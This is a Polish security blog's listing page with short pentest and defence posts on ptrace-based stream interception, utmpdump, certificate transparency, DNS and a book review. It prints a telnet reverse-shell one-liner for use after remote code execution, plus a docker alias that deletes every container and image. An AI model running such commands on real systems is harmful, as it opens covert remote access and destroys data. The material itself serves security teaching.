NFsec Logo

Reverse shell z telnet

12/11/2022 w Pen Test Możliwość komentowania Reverse shell z telnet została wyłączona

Na atakowanej maszynie, na której mamy możliwość RCE (ang. Remote Code Execution) wydajemy polecenie:

mkfifo /tmp/rsh; sh -i 2>&1 < /tmp/rsh | telnet 127.0.0.1 31337 > /tmp/rsh; rm /tmp/rsh

Więcej informacji: Alh4zr3d on Twitter

Siphon – przechwytywanie strumieni wejścia / wyjścia / błędów dla dowolnego procesu

09/11/2022 w Bezpieczeństwo Możliwość komentowania Siphon – przechwytywanie strumieni wejścia / wyjścia / błędów dla dowolnego procesu została wyłączona

L

iam Galvin napisał w języku Go ciekawe narzędzie o nazwie siphon, które za pomocą ptrace potrafi przechwycić strumień wejścia (stdin) wyjścia (stdout) i błędów (stderr) dla dowolnego procesu podając tylko jego PID:

root@darkstar:~# wget 'https://github.com/liamg/siphon/releases/download/v0.0.2/siphon'
root@darkstar:~# chmod +x siphon-linux-amd64
root@darkstar:~# ps xuaw| egrep ^agresor.*bash
agresor   2297 0.0 0.1  8728 5536 pts/2  Ss+ 19:38  0:00 -bash
root@darkstar:~# ./siphon-linux-amd64 2297
agresor@darkstar:~$ echo elemelek
elemelek
agresor@darkstar:~$ export
declare -x DBUS_SESSION_BUS_ADDRESS="unix:path=/run/user/1000/bus"
declare -x HOME="/home/agresor"
declare -x LANG="en_US.UTF-8"
declare -x LC_ALL="en_US.UTF-8"
declare -x LC_CTYPE="UTF-8"
declare -x LC_TERMINAL="iTerm2"
declare -x LC_TERMINAL_VERSION="3.4.16"
declare -x LESSCLOSE="/usr/bin/lesspipe %s %s"
declare -x LESSOPEN="| /usr/bin/lesspipe %s"
declare -x LOGNAME="agresor"

Podobnie możemy zrobić z strace. W celu powstrzymania przechwytywania za pomocą ptrace – wystarczy wyłączyć tą możliwość:

root@darkstar:~# sysctl -w kernel.yama.ptrace_scope=3
kernel.yama.ptrace_scope = 3
root@darkstar:~# ./siphon-linux-amd64 2297
Error: could not attach to process with pid 2297: 
operation not permitted - check your permissions

Więcej informacji: Siphon

Używanie utmpdump do wykrywania manipulacji plikami logowań

30/10/2022 w Bezpieczeństwo Możliwość komentowania Używanie utmpdump do wykrywania manipulacji plikami logowań została wyłączona

Z

narzędziem utmpdump spotkaliśmy się pierwszy razy przy okazji ściągawki z informatyki śledczej w wykrywaniu włamań za pomocą linii poleceń Linuksa. W tym wpisie rozwinę trochę użycie tego narzędzia i pokażę jak można go użyć od strony defensywnej, jak i ofensywnej. Pozornie nieznane przez wielu polecenie utmpdump jest doskonałym narzędziem do wykrywania manipulacji na plikach logowań. Jeśli chodzi o system Linux to często możemy polegać na następujących trzech artefaktach w celu określenia czynności logowania i wylogowywania użytkowników:

 • /var/run/utmp – plik utmp pozwala odkryć informacje o tym, kto aktualnie korzysta z systemu.
 • /var/log/wtmp – plik wtmp rejestruje wszystkie logowania i wylogowania. Jego format jest dokładnie taki jak utmp, z tą różnicą, że pusta nazwa użytkownika wskazuje na wylogowanie z powiązanego terminala. Co więcej, nazwa terminala „~” z nazwą użytkownika „shutdown” lub „reboot” wskazuje na zamknięcie lub ponowne uruchomienie systemu.
 • /var/log/btmp – plik btmp zawiera wszystkie złe próby logowania do systemu.

Ponieważ pliki utmp, wtmp i btmp zawierają dane logowania wszystkich użytkowników, są one głównym celem modyfikacji lub usuwania wpisów przez intruzów i złośliwe oprogramowanie. Wiele rodzajów malware dla systemu Linux po prostu usunie te pliki i zastąpi je plikami o zerowej długości bajtów. Bardziej wyrafinowani napastnicy podejmują próbę wyczyszczenia poszczególnych wpisów jednak jest to trudniejszy sposób na zacieranie śladów i łatwo go zauważyć.
[ czytaj całość… ]

Czyszczenie systemu z kontenerów docker

14/10/2022 w CmdLineFu Możliwość komentowania Czyszczenie systemu z kontenerów docker została wyłączona

alias containerstorm='docker stop $(docker ps -aq) && docker rm $(docker ps -aq) && docker rmi $(docker images -q)'

1001 Pen Test oraz Bug Bounty Tips & Tricks #6 – Korelacja czasowa ważności certyfikatu

08/10/2022 w Pen Test Możliwość komentowania 1001 Pen Test oraz Bug Bounty Tips & Tricks #6 – Korelacja czasowa ważności certyfikatu została wyłączona

W

iele nowoczesnych serwisów internetowych stosuje automatyczne wydawanie i odnawianie certyfikatów TLS. Dla firm dostępne są usługi komercyjnych wystawców SSL. Dla wszystkich innych dostępne są bezpłatne usługi, takie jak Let’s Encrypt i ZeroSSL. Jednak bardzo często popełniany jest błąd w sposobie w jaki konfiguruje się wdrożenie darmowych wersji certyfikatów TLS. Pozwala on każdemu odkryć prawie wszystkie nazwy domen i subdomen używanych przez ten sam serwer webowy. Jak wiemy, istnieje takie coś jak Certyficate Transparency (CT), czyli internetowy standard bezpieczeństwa służący do monitorowania i audytu wystawiania certyfikatów TLS. Tworzy on system logów publicznych, które służą do rejestrowania wszystkich certyfikatów wydawanych przez publicznie zaufane urzędy certyfikacji (CA). Do przeszukiwania dzienników CT możemy używać serwisów: crt.sh, certstream, a także Censys, który również pozwala na przeszukiwanie wyników skanowania certyfikatów w internecie.
[ czytaj całość… ]

Domain shadowing

04/10/2022 w Ataki Internetowe Możliwość komentowania Domain shadowing została wyłączona

C

yberprzestępcy często wykorzystują nazwy domen do różnych niecnych celów: do komunikacji z serwerami C&C, dystrybucji złośliwego oprogramowania, oszustw finansowych i phishingu. Dokonując tych działań przestępcy mają do wyboru albo kupować nowe nazwy domen (złośliwa rejestracja na fałszywe dane) albo skompromitować już istniejące (przechwytując rekordy DNS). Przechwytywanie DNS obejmuje: kradzież danych logowania właściciela domeny u rejestratora lub dostawcy usługi DNS, włamanie się do rejestratora lub dostawcy usługi DNS, włamanie się do samego serwera DNS, zatruwanie pamięci serwerów DNS lub przejęcie nieużywanych subdomen.
[ czytaj całość… ]

Jak pollinate wycieka dane o serwerach do Canonical

25/09/2022 w Bezpieczeństwo Możliwość komentowania Jak pollinate wycieka dane o serwerach do Canonical została wyłączona

K

olejnym pakietem (obok base-files), który wysyła informacje o naszym serwerze do firmy Ubuntu jest pollinate. Jest to klient, który łączy się z conajmniej jednym serwerem Pollen (entropia-jako-usułga) za pośrednictwem zaszyfrowanego (HTTPS) lub nie (HTTP) protokołu i pobiera losowe ziarno. Jest to szczególnie przydatne przy pierwszym uruchomieniu obrazów w chmurze i na maszynach wirtualnych, aby zainicjować systemowy generator liczb losowych. Może być również używany na fizycznych maszynach, aby uzupełniać nastawienie pseudogeneratora liczb losowych. Sprawdźmy, co jest wysyłane do serwerów entropy.ubuntu.com, które są wpisane w standardowej konfiguracji tego programu:

sudo su - pollinate -s /bin/bash
pollinate --print-user-agent

[ czytaj całość… ]

Minimalizacja QNAME

22/09/2022 w Administracja, Bezpieczeństwo Możliwość komentowania Minimalizacja QNAME została wyłączona

M

inimalizacja QNAME (RFC 7816), czyli Query Name zmienia zapytania DNS pochodzące z resolwera rekurencyjnego, aby w każdym zapytaniu zawierał tylko tyle szczegółów, ile jest to wymagane dla tego kroku w procesie rozwiązywania danej domeny. Internet Engineering Task Force opisuje to jako technikę, „w której resolwer DNS nie wysyła już pełnej oryginalnej nazwy QNAME do nadrzędnego serwera nazw”. Powiedzmy, że chcemy odwiedzić stronę: stardust.nfsec.pl. W celu określenia adresu IP, z którym chce się połączyć przeglądarka, system wysyła zapytania do resolwera dostawcy usług internetowych (ISP) lub innego ustawionego przez konfigurację systemu. Prosi on o pełną nazwę – stardust.nfsec.pl – w tym przypadku. ISP (lub inny serwer DNS przydzielony przez zarządce sieci, z której korzystasz) zapyta root DNS, a następnie domenę najwyższego poziomu (.pl), a następnie domenę drugorzędną (nfsec.pl) o pełną nazwę domeny. W rzeczywistości wszystko, czego się dowiadujesz od głównego serwera DNS to odpowiedź na pytanie „kto odpowiada za .pl?”, a jedyne, o co pytasz serwer .pl, to „kto odpowiada za .nfsec.pl?”. Żadne z tych żądań nie musi zawierać informacji o pełnej nazwie strony internetowej, którą chcesz odwiedzić, aby odpowiedzieć na wcześniejsze pytania, ale niestety oba te serwery taką informacje otrzymują. Tak zawsze działał DNS, ale obecnie nie ma ku temu praktycznego powodu.
[ czytaj całość… ]

Adresy z Gravatar

05/09/2022 w Techblog Możliwość komentowania Adresy z Gravatar została wyłączona

S

erwis Gravatar umożliwia ustawienie swojego awatara, który będzie miał charakter globalny – ang. Globally Recognized Avatar. Serwis został stworzony przez Toma Perstona-Wernera, a od 2007 roku jest własnością firmy Automattic, która zintegrowała ją z platformą blogową WordPress. Na Gavatarze użytkownicy mogą zarejestrować konto/a na podstawie adresu e-mail i przesłać cyfrowy awatar, który będzie powiązany z tym kontem. Wtyczki Gravatar są dostępne dla większości popularnego oprogramowania do blokowania; kiedy użytkownik umieszcza komentarz na takim blogu, który wymaga podania adresu e-mail – oprogramowanie do blogowania sprawdza, czy ten adres e-mail ma powiązany awatar w serwisie Gravatar. Jeśli tak, to obrazek umieszczony w serwisie Gravatar jest wyświetlany wraz z komentarzem użytkownika.
[ czytaj całość… ]

Bellingcat – agencja wywiadowcza dla ludzi od Eliota Higginsa

26/08/2022 w Hackultura Możliwość komentowania Bellingcat – agencja wywiadowcza dla ludzi od Eliota Higginsa została wyłączona

B

ellingcat – ujawniamy prawdę w czasach postprawdy jest polskim przekładem publikacji zwartej: We Are Bellingcat: An Intelligence Agency for The People, w której Eliot Higgins opowiada nam swoją historię i historię powstania zespołu dziennikarstwa obywatelskiego. Higgins swoją przygodę zaczął od przeznaczania wycinków prywatnego czasu na prowadzenie własnych śledztw internetowych. Później pojawił się własny blog i pierwsze, szersze analizy. Coraz bardziej wnikając w śledztwa online opierające się na białym wywiadzie Eliot zdecydował się na porzucenie pracy i zajęcie się tym tematem na pełen etat. Powoli profesjonalizując swój warsztat przechodził do coraz bardziej większych spraw współpracując z przypadkowymi ludźmi, którzy byli specjalistami w swoich dziedzinach.

Kreml stosuje strategię dezinformacji oparta na czterech podstawowych metodach: umniejszaniu, wypaczaniu, rozpraszaniu i zastraszaniu.

Jednak fabuła książki to nie tylko geneza powstania „ostrzegawczego dzwoneczka” pod postacią grupy internetowych detektywów. To także raportowe przedstawienie warsztatu jaki został użyty podczas analizy wojny domowej w Syrii, próby zabójstwa Nowiczokiem byłego rosyjskiego agenta GRU – Siergieja Skripala i jego córki, czy sprawa zestrzelenia malezyjskiego samolotu Malaysia Airline (MH17) nad Ukrainą. W książce nie odnajdziemy stricte szczegółów technicznych, ale to nie znaczy, że społeczność Bellingcat się nimi nie dzieli. Wręcz przeciwnie. Ponieważ ideą tego projektu jest nie tylko przeprowadzanie własnych śledztw i analiza różnych faktów z poziomu sieci społecznościowych („Odkrywać”, „Weryfikować”, „Nagłaśniać”). To przede wszystkim dzielenie się technikami i narzędziami, które można wykorzystać w OSINT. Prowadzenie warsztatów na uniwersytetach i uczestnictwo w seminariach organizacji pozarządowych.

Internetu nie da się naprawić, tak samo jak nie da się naprawić świata.

Ponieważ szerzyciele dezinformacji mają dzisiaj do dyspozycji potężne narzędzia niż kiedykolwiek wcześniej autor, książki kładzie też dość duży nacisk na to zagadnienie. W dobie możliwości wprowadzenia szerokiej publiczności w błąd lub graniu na odpowiednich uczuciach grup społecznych niezbędne jest zachowanie dużego dystansu do tego, co czytamy w internecie. Przy analizie publikacji musimy przeprowadzać weryfikację źródła, samego materiału oraz określić dla jakiego środowiska płynie korzyść z takiej publikacji. Ponadto prowadząc dziennikarstwo obywatelskie należy ustalać fakty poprzez obiektywne udokumentowanie kompletnych dowodów i przedstawianie ich w pełnym kontekście. Opisanie ich uczciwie, przejrzyście i bez uprzedzeń kulturowych, czy faworyzowania. W przeciwnym wypadku sami możemy stać się źródłem dezinformacji.

Bellingcat nigdy nie chciał chciał konkurować z wielkimi spółkami medialnymi. Od początku przyświecały nam dwa cele – odnajdywanie dowodów i rozwijanie naszej dziedziny.

Dzisiaj stajemy u progu łączenia tradycyjnych metod śledczych z nowymi technologiami, które okazują się kluczem do zrozumienia wielu działań przestępczych. Prawie wszędzie zostawiamy swoje cyfrowe ślady, jak odciski palców, a każdy z nas może być reporterem wyposażonym tylko w telefon. Dlatego jeśli nie znamy jeszcze dokonań grupy Bellingcat i interesuje nas tematyka białego wywiadu – nie tylko pod względem technicznym, a rzeczowych opisów i wciągających historii pionierskiego dziennikarstwa śledczego – zdecydowanie warto sięgnąć po tę publikację.

Więcej informacji: Bellingcat